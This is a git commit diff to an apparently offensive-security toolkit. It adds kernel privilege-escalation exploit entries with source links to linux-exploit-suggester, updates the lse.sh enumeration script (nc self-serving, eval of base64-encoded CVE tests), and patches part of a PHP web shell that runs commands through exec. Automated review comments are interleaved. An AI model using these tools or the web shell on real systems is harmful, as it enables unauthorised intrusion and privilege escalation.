Project Update

Roman Hergenreder 2022-12-05 10:09:01 +01:00
parent a86fff1b36
commit 80abe85b85
11 changed files with 2722 additions and 1573 deletions

@ -79,14 +79,15 @@ class Crawler:
self.queue.put(parts._replace(netloc=self.domain, scheme=self.scheme,fragment="").geturl()) self.queue.put(parts._replace(netloc=self.domain, scheme=self.scheme,fragment="").geturl())
def collect_urls(self, page): def collect_urls(self, page):
soup = BeautifulSoup(page, "html.parser") if not isinstance(page, BeautifulSoup):
page = BeautifulSoup(page, "html.parser")
urls = set() urls = set()
attrs = ["src","href","action"] attrs = ["src","href","action"]
tags = ["a","link","script","img","form"] tags = ["a","link","script","img","form"]
for tag in tags: for tag in tags:
for e in soup.find_all(tag): for e in page.find_all(tag):
for attr in attrs: for attr in attrs:
if e.has_attr(attr): if e.has_attr(attr):
urls.add(e[attr]) urls.add(e[attr])

3862
linpeas.sh


@ -1,7 +1,7 @@
#!/bin/bash #!/bin/bash
# #
# Copyright (c) 2016-2020, @_mzet_ # Copyright (c) 2016-2022, @_mzet_
# #
# linux-exploit-suggester.sh comes with ABSOLUTELY NO WARRANTY. # linux-exploit-suggester.sh comes with ABSOLUTELY NO WARRANTY.
# This is free software, and you are welcome to redistribute it # This is free software, and you are welcome to redistribute it
@ -930,6 +930,44 @@ author: theflow (orginal exploit author); bcoles (author of exploit update at 'e
EOF EOF
) )
EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2022-0847]${txtrst} DirtyPipe
Reqs: pkg=linux-kernel,ver>=5.8,ver<=5.16.11
Tags: ubuntu=(20.04|21.04),debian=11
Rank: 1
analysis-url: https://dirtypipe.cm4all.com/
src-url: https://haxx.in/files/dirtypipez.c
exploit-db: 50808
author: blasty (original exploit author: Max Kellermann)
EOF
)
EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2022-2586]${txtrst} nft_object UAF
Reqs: pkg=linux-kernel,ver>=3.16,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1
Tags: ubuntu=(20.04){kernel:5.12.13}
Rank: 1
analysis-url: https://www.openwall.com/lists/oss-security/2022/08/29/5
src-url: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
author: vulnerability discovery: Team Orca of Sea Security; Exploit author: Alejandro Guerrero
EOF
)
EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2022-32250]${txtrst} nft_object UAF (NFT_MSG_NEWSET)
Reqs: pkg=linux-kernel,ver<5.18.1,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1
Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
Rank: 1
analysis-url: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
analysis-url: https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
src-url: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
author: vulnerability discovery: EDG Team from NCC Group; Author of this exploit: theori.io
EOF
)
############ USERSPACE EXPLOITS ########################### ############ USERSPACE EXPLOITS ###########################
n=0 n=0
@ -1769,7 +1807,7 @@ EOF
FEATURES[((n++))]=$(cat <<EOF FEATURES[((n++))]=$(cat <<EOF
feature: Syscalls filtering feature: Syscalls filtering
available: CONFIG_SECCOMP=y available: CONFIG_SECCOMP=y
enabled: cmd:grep -i Seccomp /proc/self/status | awk '{print \$2}' enabled: cmd:grep -iw Seccomp /proc/self/status | awk '{print \$2}'
analysis-url: https://github.com/mzet-/les-res/blob/master/features/bpf_syscall.md analysis-url: https://github.com/mzet-/les-res/blob/master/features/bpf_syscall.md
EOF EOF
) )
@ -2167,8 +2205,8 @@ for FEATURE in "${FEATURES[@]}"; do
feature=$(echo "$FEATURE" | grep "feature: " | cut -d' ' -f 2-) feature=$(echo "$FEATURE" | grep "feature: " | cut -d' ' -f 2-)
if [ -n "$cmdStdout" ]; then if [ -n "$cmdStdout" ]; then
if [ "$cmdStdout" -eq 0 ]; then if [ $cmdStdout -eq 0 ]; then
state="[ ${txtred}Set to $cmdStdout${txtrst} ]" state="[ ${txtred}Set to $cmdStdout${txtrst} ]"
cmdStdout="" cmdStdout=""
else else
@ -2181,15 +2219,15 @@ for FEATURE in "${FEATURES[@]}"; do
# for 3rd party (3) mode display "N/A" or "Enabled" # for 3rd party (3) mode display "N/A" or "Enabled"
if [ $MODE -eq 3 ]; then if [ $MODE -eq 3 ]; then
enabled="[ ${txtgrn}Enabled${txtrst} ]" enabled="[ ${txtgrn}Enabled${txtrst} ]"
disabled="[ ${txtgray}N/A${txtrst} ]" disabled="[ ${txtgray}N/A${txtrst} ]"
# for attack-surface (4) mode display "Locked" or "Exposed" # for attack-surface (4) mode display "Locked" or "Exposed"
elif [ $MODE -eq 4 ]; then elif [ $MODE -eq 4 ]; then
enabled="[ ${txtred}Exposed${txtrst} ]" enabled="[ ${txtred}Exposed${txtrst} ]"
disabled="[ ${txtgrn}Locked${txtrst} ]" disabled="[ ${txtgrn}Locked${txtrst} ]"
#other modes" "Disabled" / "Enabled" # other modes" "Disabled" / "Enabled"
else else
enabled="[ ${txtgrn}Enabled${txtrst} ]" enabled="[ ${txtgrn}Enabled${txtrst} ]"
disabled="[ ${txtred}Disabled${txtrst} ]" disabled="[ ${txtred}Disabled${txtrst} ]"
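Review bot: The DirtyPipe entry's upper bound `Reqs: pkg=linux-kernel,ver>=5.8,ver<=5.16.11` includes the release that carries the fix, so a kernel reporting exactly that version would be flagged as affected; the sibling CVE-2022-32250 entry in the same hunk uses a strict bound (`ver<5.18.1`), and this one should do the same: `Reqs: pkg=linux-kernel,ver>=5.8,ver<5.16.11`. The fix was also backported to older stable series, which a single range cannot express, so a `Comments:` line saying that a hit on an older long-term kernel needs manual confirmation against the distribution's patched package would make the report less misleading. Separately, the hunk at `@ -2167,8 +2205,8 @@` removes the quotes in `if [ $cmdStdout -eq 0 ]`; if that was a workaround for the multi-line output the `grep -iw Seccomp` change now prevents, the quoted form `if [ "$cmdStdout" -eq 0 ]; then` is the safer one to keep, since an unquoted empty or multi-word value turns into a test syntax error rather than a clean false branch.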

311
lse.sh

@ -1,15 +1,15 @@
#!/bin/sh #!/bin/sh
# shellcheck disable=1003,1091,2006,2016,2034,2039 # shellcheck disable=1003,1091,2006,2016,2034,2039,3043
# vim: set ts=2 sw=2 sts=2 et: # vim: set ts=2 sw=2 sts=2 fdm=marker fmr=#(,#) et:
# Author: Diego Blanco <diego.blanco@treitos.com> # Author: Diego Blanco <diego.blanco@treitos.com>
# GitHub: https://github.com/diego-treitos/linux-smart-enumeration # GitHub: https://github.com/diego-treitos/linux-smart-enumeration
# #
lse_version="3.10" lse_version="4.10nw"
#( Colors ##( Colors
# #
# fg #( fg
red='\e[31m' red='\e[31m'
lred='\e[91m' lred='\e[91m'
green='\e[32m' green='\e[32m'
@ -26,8 +26,8 @@ grey='\e[90m'
lgrey='\e[37m' lgrey='\e[37m'
white='\e[97m' white='\e[97m'
black='\e[30m' black='\e[30m'
# ##)
# bg #( bg
b_red='\e[41m' b_red='\e[41m'
b_lred='\e[101m' b_lred='\e[101m'
b_green='\e[42m' b_green='\e[42m'
@ -44,8 +44,8 @@ b_grey='\e[100m'
b_lgrey='\e[47m' b_lgrey='\e[47m'
b_white='\e[107m' b_white='\e[107m'
b_black='\e[40m' b_black='\e[40m'
# ##)
# special #( special
reset='\e[0;0m' reset='\e[0;0m'
bold='\e[01m' bold='\e[01m'
italic='\e[03m' italic='\e[03m'
@ -59,13 +59,13 @@ underline_off='\e[24m'
inverse_off='\e[27m' inverse_off='\e[27m'
conceil_off='\e[28m' conceil_off='\e[28m'
crossedout_off='\e[29m' crossedout_off='\e[29m'
##)
#) #)
#( Globals ##( Globals
# #
# user # user
lse_user_id="$UID" lse_user_id="`id -u`"
[ -z "$lse_user_id" ] && lse_user_id="`id -u`"
lse_user="$USER" lse_user="$USER"
[ -z "$lse_user" ] && lse_user="`id -nu`" [ -z "$lse_user" ] && lse_user="`id -nu`"
lse_pass="" lse_pass=""
@ -77,7 +77,8 @@ lse_arch="`uname -m`"
lse_linux="`uname -r`" lse_linux="`uname -r`"
lse_hostname="`hostname`" lse_hostname="`hostname`"
lse_distro=`command -v lsb_release >/dev/null 2>&1 && lsb_release -d | sed 's/Description:\s*//' 2>/dev/null` lse_distro=`command -v lsb_release >/dev/null 2>&1 && lsb_release -d | sed 's/Description:\s*//' 2>/dev/null`
[ -z "$lse_distro" ] && lse_distro="`(source /etc/os-release && echo "$PRETTY_NAME")2>/dev/null`" [ -z "$lse_distro" ] && lse_distro="`(. /etc/os-release && echo "$PRETTY_NAME")2>/dev/null`"
lse_distro_codename="" # retrieved below with lse_get_distro_codename
# lse # lse
lse_passed_tests="" lse_passed_tests=""
@ -85,11 +86,12 @@ lse_executed_tests=""
lse_DEBUG=false lse_DEBUG=false
lse_procmon_data=`mktemp` lse_procmon_data=`mktemp`
lse_procmon_lock=`mktemp` lse_procmon_lock=`mktemp`
lse_cve_tmp=''
# printf # printf
printf "%s" "$reset" | grep -q '\\' && alias printf="env printf" printf "%s" "$reset" | grep -q '\\' && alias printf="env printf"
# internal data #( internal data
lse_common_setuid=" lse_common_setuid="
/bin/fusermount /bin/fusermount
/bin/mount /bin/mount
@ -176,12 +178,14 @@ lse_common_setuid="
/usr/sbin/usernetctl /usr/sbin/usernetctl
/usr/sbin/uuidd /usr/sbin/uuidd
" "
#regex rules for common setuid #)
#( regex rules for common setuid
lse_common_setuid="$lse_common_setuid lse_common_setuid="$lse_common_setuid
/snap/core.* /snap/core.*
/var/tmp/mkinitramfs.* /var/tmp/mkinitramfs.*
" "
#critical writable files #)
#( critical writable files
lse_critical_writable=" lse_critical_writable="
/etc/apache2/apache2.conf /etc/apache2/apache2.conf
/etc/apache2/httpd.conf /etc/apache2/httpd.conf
@ -235,8 +239,13 @@ lse_critical_writable_dirs="
/root /root
" "
#) #)
#( CVE list (populated by the lse packager)
lse_cve_list="
" #CVElistMARKER
#)
#)
#( Options ##( Options
lse_color=true lse_color=true
lse_alt_color=false lse_alt_color=false
lse_interactive=true lse_interactive=true
@ -247,16 +256,16 @@ lse_find_opts='-path /proc -prune -o -path /sys -prune -o -path /dev -prune -o'
lse_grep_opts='--color=always' lse_grep_opts='--color=always'
#) #)
#( Lib ##( Lib
cecho() { cecho() { #(
if $lse_color; then if $lse_color; then
printf "%b" "$@" printf "%b" "$@"
else else
# If color is disabled we remove it # If color is disabled we remove it
printf "%b" "$@" | sed 's/\x1B\[[0-9;]\+[A-Za-z]//g' printf "%b" "$@" | sed 's/\x1B\[[0-9;]\+[A-Za-z]//g'
fi fi
} } #)
lse_recolor() { lse_recolor() { #(
o_white="$white" o_white="$white"
o_lyellow="$lyellow" o_lyellow="$lyellow"
o_grey="$grey" o_grey="$grey"
@ -270,11 +279,11 @@ lse_recolor() {
lred="$red" lred="$red"
lgreen="$b_lgreen$black" lgreen="$b_lgreen$black"
lcyan="$cyan" lcyan="$cyan"
} } #)
lse_error() { lse_error() { #(
cecho "${red}ERROR: ${reset}$*\n" >&2 cecho "${red}ERROR: ${reset}$*\n" >&2
} } #)
lse_exclude_paths() { lse_exclude_paths() { #(
local IFS=" local IFS="
" "
for p in `printf "%s" "$1" | tr ',' '\n'`; do for p in `printf "%s" "$1" | tr ',' '\n'`; do
@ -282,8 +291,8 @@ lse_exclude_paths() {
p="${p%%/}" p="${p%%/}"
lse_find_opts="$lse_find_opts -path ${p} -prune -o" lse_find_opts="$lse_find_opts -path ${p} -prune -o"
done done
} } #)
lse_set_level() { lse_set_level() { #(
case "$1" in case "$1" in
0|1|2) 0|1|2)
lse_level=$(($1)) lse_level=$(($1))
@ -293,8 +302,8 @@ lse_set_level() {
exit 1 exit 1
;; ;;
esac esac
} } #)
lse_help() { lse_help() { #(
echo "Use: $0 [options]" echo "Use: $0 [options]"
echo echo
echo " OPTIONS" echo " OPTIONS"
@ -319,6 +328,7 @@ lse_help() {
echo " pro: Processes related tests." echo " pro: Processes related tests."
echo " sof: Software related tests." echo " sof: Software related tests."
echo " ctn: Container (docker, lxc) related tests." echo " ctn: Container (docker, lxc) related tests."
echo " cve: CVE related tests."
echo " Specific tests can be used with their IDs (i.e.: usr020,sud)" echo " Specific tests can be used with their IDs (i.e.: usr020,sud)"
echo " -e PATHS Comma separated list of paths to exclude. This allows you" echo " -e PATHS Comma separated list of paths to exclude. This allows you"
echo " to do faster scans at the cost of completeness" echo " to do faster scans at the cost of completeness"
@ -326,8 +336,8 @@ lse_help() {
echo " processes. A value of 0 will disable any watch (default: 60)" echo " processes. A value of 0 will disable any watch (default: 60)"
echo " -S Serve the lse.sh script in this host so it can be retrieved" echo " -S Serve the lse.sh script in this host so it can be retrieved"
echo " from a remote host." echo " from a remote host."
} } #)
lse_ask() { lse_ask() { #(
local question="$1" local question="$1"
# We use stderr to print the question # We use stderr to print the question
cecho "${white}${question}: ${reset}" >&2 cecho "${white}${question}: ${reset}" >&2
@ -341,24 +351,24 @@ lse_ask() {
return 1 return 1
;; ;;
esac esac
} } #)
lse_request_information() { lse_request_information() { #(
if $lse_interactive; then if $lse_interactive; then
cecho "${grey}---\n" cecho "${grey}---\n"
[ -z "$lse_user" ] && lse_user=`lse_ask "Could not find current user name. Current user?"` [ -z "$lse_user" ] && lse_user=`lse_ask "Could not find current user name. Current user?"`
lse_pass=`lse_ask "If you know the current user password, write it here to check sudo privileges"` lse_pass=`lse_ask "If you know the current user password, write it here to check sudo privileges"`
cecho "${grey}---\n" cecho "${grey}---\n"
fi fi
} } #)
lse_test_passed() { lse_test_passed() { #(
# Checks if a test passed by ID # Checks if a test passed by ID
local id="$1" local id="$1"
for i in $lse_passed_tests; do for i in $lse_passed_tests; do
[ "$i" = "$id" ] && return 0 [ "$i" = "$id" ] && return 0
done done
return 1 return 1
} } #)
lse_test() { lse_test() { #(
# Test id # Test id
local id="$1" local id="$1"
# Minimum level required for this test to show its output # Minimum level required for this test to show its output
@ -394,8 +404,8 @@ lse_test() {
# Print name and line # Print name and line
cecho "${white}[${l}${white}] ${grey}${id}${white} $name${grey}" cecho "${white}[${l}${white}] ${grey}${id}${white} $name${grey}"
for i in $(seq $((${#name}+4)) 67); do for i in $(seq $((${#id}+${#name}+10)) 79); do
echo -n "." printf "."
done done
# Check dependencies # Check dependencies
@ -445,8 +455,8 @@ lse_test() {
fi fi
return 0 return 0
fi fi
} } #)
lse_show_info() { lse_show_info() { #(
echo echo
cecho "${lcyan} LSE Version:${reset} $lse_version\n" cecho "${lcyan} LSE Version:${reset} $lse_version\n"
echo echo
@ -470,12 +480,14 @@ lse_show_info() {
fi fi
cecho "${lblue}Architecture:${reset} $lse_arch\n" cecho "${lblue}Architecture:${reset} $lse_arch\n"
echo echo
} cecho "${green}=====================(${yellow} Current Output Verbosity Level: ${cyan}$lse_level ${green})======================${reset}"
lse_serve() { echo
} #)
lse_serve() { #(
# get port # get port
which nc >/dev/null || lse_error "Could not find 'nc' netcat binary." which nc >/dev/null || lse_error "Could not find 'nc' netcat binary."
local_ips="`ip a | grep -Eo 'inet ([0-9]{1,3}\.){3}[0-9]{1,3}' | cut -d' ' -f2`" local_ips="`ip a | grep -Eo "inet ([0-9]{1,3}\.){3}[0-9]{1,3}" | cut -d' ' -f2`"
# Get a valid and non used port # Get a valid and non used port
port=`od -An -N2 -i /dev/random|grep -Eo '[0-9]+'` port=`od -An -N2 -i /dev/random|grep -Eo '[0-9]+'`
@ -506,8 +518,8 @@ lse_serve() {
done done
# try nc with '-N' (openbsd), then ncat and then use '-q0' (traditional) # try nc with '-N' (openbsd), then ncat and then use '-q0' (traditional)
nc -l -N -p "$port" < "$0" >/dev/null 2>/dev/null || nc -l --send-only -p "$port" < "$0" >/dev/null 2>/dev/null || nc -l -q0 -p "$port" < "$0" >/dev/null nc -l -N -p "$port" < "$0" >/dev/null 2>/dev/null || nc -l --send-only -p "$port" < "$0" >/dev/null 2>/dev/null || nc -l -q0 -p "$port" < "$0" >/dev/null
} } #)
lse_header() { lse_header() { #(
local id="$1" local id="$1"
shift shift
local title="$*" local title="$*"
@ -530,8 +542,8 @@ lse_header() {
done done
text="$text(${green} $title ${magenta})=====" text="$text(${green} $title ${magenta})====="
cecho "$text${reset}\n" cecho "$text${reset}\n"
} } #)
lse_exit() { lse_exit() { #(
local ec=1 local ec=1
local text="\n${magenta}==================================" local text="\n${magenta}=================================="
[ "$1" ] && ec=$1 [ "$1" ] && ec=$1
@ -539,18 +551,32 @@ lse_exit() {
cecho "$text${reset}\n" cecho "$text${reset}\n"
rm -f "$lse_procmon_data" rm -f "$lse_procmon_data"
rm -f "$lse_procmon_lock" rm -f "$lse_procmon_lock"
rm -f "$lse_cve_tmp"
exit "$ec" exit "$ec"
} } #)
lse_procmon() { lse_procmon() { #(
# monitor processes # monitor processes
#NOTE: The first number will be the number of occurrences of a process due to #NOTE: The first number will be the number of occurrences of a process due to
# uniq -c # uniq -c
local ps_args
local ps_busybox
if ps -V 2>&1 | grep -iq busybox; then
ps_args='-o pid,user,args'
ps_busybox=true
else
ps_args="-ewwwo start_time,pid,user:50,args"
ps_busybox=false
fi
while [ -f "$lse_procmon_lock" ]; do while [ -f "$lse_procmon_lock" ]; do
ps -ewwwo start_time,pid,user:50,args if $ps_busybox; then
ps $ps_args | sed 's/^\([0-9]*\)/? \1 /g'
else
ps $ps_args
fi
sleep 0.001 sleep 0.001
done | grep -v 'ewwwo start_time,pid,user:50,args' | sed 's/^ *//g' | tr -s '[:space:]' | grep -v "^START" | grep -Ev '[^ ]+ [^ ]+ [^ ]+ \[' | sort -Mr | uniq -c | sed 's/^ *//g' > "$lse_procmon_data" done | grep -Ev "(pid,user|$lse_user *sed s/)" | sed 's/^ *//g' | tr -s '[:space:]' | grep -Ev "PID *USER *COMMAND" | grep -Ev '[^ ]+ [^ ]+ [^ ]+ \[' | sort -Mr | uniq -c | sed 's/^ *//g' > "$lse_procmon_data"
} } #)
lse_proc_print() { lse_proc_print() { #(
# Pretty prints output from lse_procmom received via stdin # Pretty prints output from lse_procmom received via stdin
if $lse_color; then if $lse_color; then
printf "${green}%s %8s %8s %s\n" "START" "PID" "USER" "COMMAND" printf "${green}%s %8s %8s %s\n" "START" "PID" "USER" "COMMAND"
@ -574,7 +600,57 @@ lse_proc_print() {
printf "%s %8s %8s %s\n" "$p_time" "$p_pid" "$p_user" "$p_args" printf "%s %8s %8s %s\n" "$p_time" "$p_pid" "$p_user" "$p_args"
fi fi
done done
} } #)
lse_get_distro_codename() { #(
# Get the distribution name
#
# ubuntu, debian, centos, redhat, opsuse, fedora, rocky
local distro="${grey}unknown${reset}"
if type lsb_release >/dev/null 2>&1; then
distro=`lsb_release -is`
elif [ -f /etc/os-release ]; then
distro=`grep -E '^ID=' /etc/os-release | cut -f2 -d=`
echo "$distro" | grep -qi opensuse && distro=opsuse
elif [ -f /etc/redhat-release ]; then
grep -qi "centos" /etc/redhat-release && distro=centos
grep -qi "fedora" /etc/redhat-release && distro=fedora
grep -qi "red hat" /etc/redhat-release && distro=redhat
grep -qi "rocky" /etc/redhat-release && distro=rocky
fi
printf '%s' "$distro" | tr '[:upper:]' '[:lower:]' | tr -d \"\'
} #)
lse_is_version_bigger() { #(
# check if version v1 is bigger than v2
local v1="$1"; local v2="$2" ; local vc
[ "$v1" = "$v2" ] && return 1 # equal is not bigger
vc="`printf "%s\n%s\n" "$v1" "$v2" | sort -rV | head -n1`"
[ "$v1" = "$vc" ] && return 0
return 1
} #)
lse_get_pkg_version() { #(
# get package version depending on distro
# returns 2 if distro is unknown
# returns 1 if package is not installed (or doesn't exist)
# returns 0 on success, and prints out the package version
pkg_name="$1"
case "$lse_distro_codename" in
debian|ubuntu)
pkg_version=`dpkg -l "$pkg_name" 2>/dev/null | grep -E '^ii' | tr -s ' ' | cut -d' ' -f3`
;;
centos|redhat|fedora|opsuse|rocky|amzn)
pkg_version=`rpm -q "$pkg_name" 2>/dev/null`
pkg_version="${pkg_version##"$pkg_name"-}"
pkg_version=`echo "$pkg_version" | sed -E 's/\.(aarch64|armv7hl|i686|noarch|ppc64le|s390x|x86_64)$//'`
;;
*)
return 2
;;
esac
[ -z "$pkg_version" ] && return 1
printf "%s" "$pkg_version"
return 0
} #)
#)
#) #)
########################################################################( TESTS ########################################################################( TESTS
@ -638,7 +714,7 @@ lse_run_tests_users() {
'for ep in $lse_exec_paths; do [ "$ep" = "." ] && grep -ER "^ *PATH=.*" /etc/ 2> /dev/null | tr -d \"\'"'"' | grep -E "[=:]\.([:[:space:]]|\$)";done' \ 'for ep in $lse_exec_paths; do [ "$ep" = "." ] && grep -ER "^ *PATH=.*" /etc/ 2> /dev/null | tr -d \"\'"'"' | grep -E "[=:]\.([:[:space:]]|\$)";done' \
"usr070" "usr070"
} }
#)
#########################################################################( sudo #########################################################################( sudo
lse_run_tests_sudo() { lse_run_tests_sudo() {
@ -688,7 +764,7 @@ lse_run_tests_sudo() {
"Do we know if any other users used sudo?" \ "Do we know if any other users used sudo?" \
'for uh in $(cut -d: -f1,6 /etc/passwd); do [ -f "${uh##*:}/.sudo_as_admin_successful" ] && echo "${uh%%:*}"; done' 'for uh in $(cut -d: -f1,6 /etc/passwd); do [ -f "${uh##*:}/.sudo_as_admin_successful" ] && echo "${uh%%:*}"; done'
} }
#)
##################################################################( file system ##################################################################( file system
lse_run_tests_filesystem() { lse_run_tests_filesystem() {
@ -851,7 +927,7 @@ lse_run_tests_filesystem() {
"Dump fstab file" \ "Dump fstab file" \
'cat /etc/fstab' 'cat /etc/fstab'
} }
#)
#######################################################################( system #######################################################################( system
lse_run_tests_system() { lse_run_tests_system() {
@ -907,7 +983,7 @@ lse_run_tests_system() {
"System password policies in /etc/login.defs" \ "System password policies in /etc/login.defs" \
'grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs' 'grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs'
} }
#)
#####################################################################( security #####################################################################( security
lse_run_tests_security() { lse_run_tests_security() {
@ -953,7 +1029,7 @@ lse_run_tests_security() {
"Can we read the auditd log?" \ "Can we read the auditd log?" \
'al=/var/log/audit/audit.log; test -r "$al" && echo "tail $al:" && echo && tail "$al"' 'al=/var/log/audit/audit.log; test -r "$al" && echo "tail $al:" && echo && tail "$al"'
} }
#)
##############################################################( recurrent tasks ##############################################################( recurrent tasks
lse_run_tests_recurrent_tasks() { lse_run_tests_recurrent_tasks() {
@ -1021,7 +1097,7 @@ lse_run_tests_recurrent_tasks() {
"Systemd timers" \ "Systemd timers" \
'systemctl list-timers --all' 'systemctl list-timers --all'
} }
#)
######################################################################( network ######################################################################( network
lse_run_tests_network() { lse_run_tests_network() {
@ -1072,7 +1148,7 @@ lse_run_tests_network() {
"Listening UDP" \ "Listening UDP" \
'netstat -unlp || ss -unlp' 'netstat -unlp || ss -unlp'
} }
#)
#####################################################################( services #####################################################################( services
lse_run_tests_services() { lse_run_tests_services() {
@ -1167,7 +1243,7 @@ lse_run_tests_services() {
"Systemd config files permissions" \ "Systemd config files permissions" \
'ls -lthR /lib/systemd/ /etc/systemd/' 'ls -lthR /lib/systemd/ /etc/systemd/'
} }
#)
#####################################################################( software #####################################################################( software
lse_run_tests_software() { lse_run_tests_software() {
@ -1310,7 +1386,7 @@ lse_run_tests_software() {
'screen -v' 'screen -v'
} }
#)
###################################################################( containers ###################################################################( containers
lse_run_tests_containers() { lse_run_tests_containers() {
@ -1341,7 +1417,7 @@ lse_run_tests_containers() {
"Is the user a member of any lxc/lxd group?" \ "Is the user a member of any lxc/lxd group?" \
'groups | grep $lse_grep_opts "lxc\|lxd"' 'groups | grep $lse_grep_opts "lxc\|lxd"'
} }
#)
####################################################################( processes ####################################################################( processes
lse_run_tests_processes() { lse_run_tests_processes() {
@ -1398,49 +1474,84 @@ lse_run_tests_processes() {
'printf "%s\n" "$lse_proc_bin" | xargs ls -l' \ 'printf "%s\n" "$lse_proc_bin" | xargs ls -l' \
"pro001" "pro001"
} }
#)
#########################################################################( CVEs
lse_run_tests_cves() {
lse_header "cve" "CVEs"
if [ "${#lse_cve_list}" = 1 ]; then
if [ -z "$lse_selection" ] || printf "%s" "$lse_selection" | grep -iq 'cve'; then
printf "%s\n%s\n%s" \
" In order to test for CVEs, download lse.sh from the GitHub releases page." \
" Alternatively, build lse_cve.sh using tools/package_cvs_into_lse.sh from the" \
" repository."
fi
else
for lse_cve in $lse_cve_list; do
eval "$(printf '%s' "$lse_cve" | base64 -d | gunzip -c)"
lse_test "$lse_cve_id" "$lse_cve_level" \
"$lse_cve_description" \
"lse_cve_test"
done
fi
}
#)
# #
##) ##)
#( Main #( Main
while getopts "hcCil:e:p:s:S" option; do main() {
case "${option}" in while getopts "hcCil:e:p:s:S" option; do
c) lse_color=false; lse_grep_opts='--color=never';; case "${option}" in
C) lse_alt_color=true;; c) lse_color=false; lse_grep_opts='--color=never';;
e) lse_exclude_paths "${OPTARG}";; C) lse_alt_color=true;;
i) lse_interactive=false;; e) lse_exclude_paths "${OPTARG}";;
l) lse_set_level "${OPTARG}";; i) lse_interactive=false;;
s) lse_selection="`printf \"%s\" \"${OPTARG}\"|sed 's/,/ /g'`";; l) lse_set_level "${OPTARG}";;
p) lse_proc_time="${OPTARG}";; s) lse_selection="`printf \"%s\" \"${OPTARG}\"|sed 's/,/ /g'`";;
S) lse_serve; exit $?;; p) lse_proc_time="${OPTARG}";;
h) lse_help; exit 0;; S) lse_serve; exit $?;;
*) lse_help; exit 1;; h) lse_help; exit 0;;
esac *) lse_help; exit 1;;
done esac
done
#trap to exec on SIGINT #trap to exec on SIGINT
trap "lse_exit 1" 2 trap "lse_exit 1" 2
# use alternative color scheme # use alternative color scheme
$lse_alt_color && lse_recolor $lse_alt_color && lse_recolor
lse_request_information lse_request_information
lse_show_info lse_show_info
PATH="$PATH:/sbin:/usr/sbin" #fix path just in case PATH="$PATH:/sbin:/usr/sbin" #fix path just in case
lse_distro_codename=`lse_get_distro_codename`
lse_procmon & lse_procmon &
(sleep "$lse_proc_time"; rm -f "$lse_procmon_lock") & (sleep "$lse_proc_time"; rm -f "$lse_procmon_lock") &
lse_run_tests_users ## NO WAR
lse_run_tests_sudo lse_header "nowar" "humanity"
lse_run_tests_filesystem lse_test "nowar0" "0" \
lse_run_tests_system 'Should we question autocrats and their "military operations"?' \
lse_run_tests_security 'cecho " $black$b_blue NO $reset\n $black$b_yellow WAR $reset"'
lse_run_tests_recurrent_tasks
lse_run_tests_network
lse_run_tests_services
lse_run_tests_software
lse_run_tests_containers
lse_run_tests_processes
lse_exit 0 lse_run_tests_users
lse_run_tests_sudo
lse_run_tests_filesystem
lse_run_tests_system
lse_run_tests_security
lse_run_tests_recurrent_tasks
lse_run_tests_network
lse_run_tests_services
lse_run_tests_software
lse_run_tests_containers
lse_run_tests_processes
lse_run_tests_cves
lse_exit 0
}
[ ! "$lse_NO_EXEC" ] && main "$@"
#) #)
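Review bot: `lse_get_distro_codename` normalizes openSUSE to the `opsuse` token only inside the `/etc/os-release` branch (`echo "$distro" | grep -qi opensuse && distro=opsuse`); when `lsb_release` is installed, the `lsb_release -is` result (presumably `openSUSE`) is merely lowercased to `opensuse`, which the `centos|redhat|fedora|opsuse|rocky|amzn` arm in `lse_get_pkg_version` does not match, so package lookups on such hosts take the `return 2` path. Moving that normalization below the `fi`, immediately before the final `printf '%s' "$distro" | tr ...`, applies it to every branch. In `lse_get_pkg_version`, `pkg_name` and `pkg_version` are assigned without `local`, unlike the neighbouring helpers, so they leak into the global namespace; `local pkg_name="$1"` and `local pkg_version` fix that. It is also worth a comment above `lse_run_tests_cves` that each entry of `lse_cve_list` is base64-decoded, gunzipped and passed to `eval`, so the `#CVElistMARKER` region is executable code and anyone editing or repackaging the script must treat it with the same care as the script body itself.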

@ -1,14 +1,22 @@
<?php <?php
function expandPath($path) {
if (preg_match("#^(~[a-zA-Z0-9_.-]*)(/.*)?$#", $path, $match)) {
exec("echo $match[1]", $stdout);
return $stdout[0] . $match[2];
}
return $path;
}
function featureShell($cmd, $cwd) { function featureShell($cmd, $cwd) {
$stdout = array(); $stdout = array();
if (preg_match("/^\s*cd\s*$/", $cmd)) { if (preg_match("/^\s*cd\s*(2>&1)?$/", $cmd)) {
// pass chdir(expandPath("~"));
} elseif (preg_match("/^\s*cd\s+(.+)\s*(2>&1)?$/", $cmd)) { } elseif (preg_match("/^\s*cd\s+(.+)\s*(2>&1)?$/", $cmd)) {
chdir($cwd); chdir($cwd);
preg_match("/^\s*cd\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match); preg_match("/^\s*cd\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match);
chdir($match[1]); chdir(expandPath($match[1]));
} elseif (preg_match("/^\s*download\s+[^\s]+\s*(2>&1)?$/", $cmd)) { } elseif (preg_match("/^\s*download\s+[^\s]+\s*(2>&1)?$/", $cmd)) {
chdir($cwd); chdir($cwd);
preg_match("/^\s*download\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match); preg_match("/^\s*download\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match);
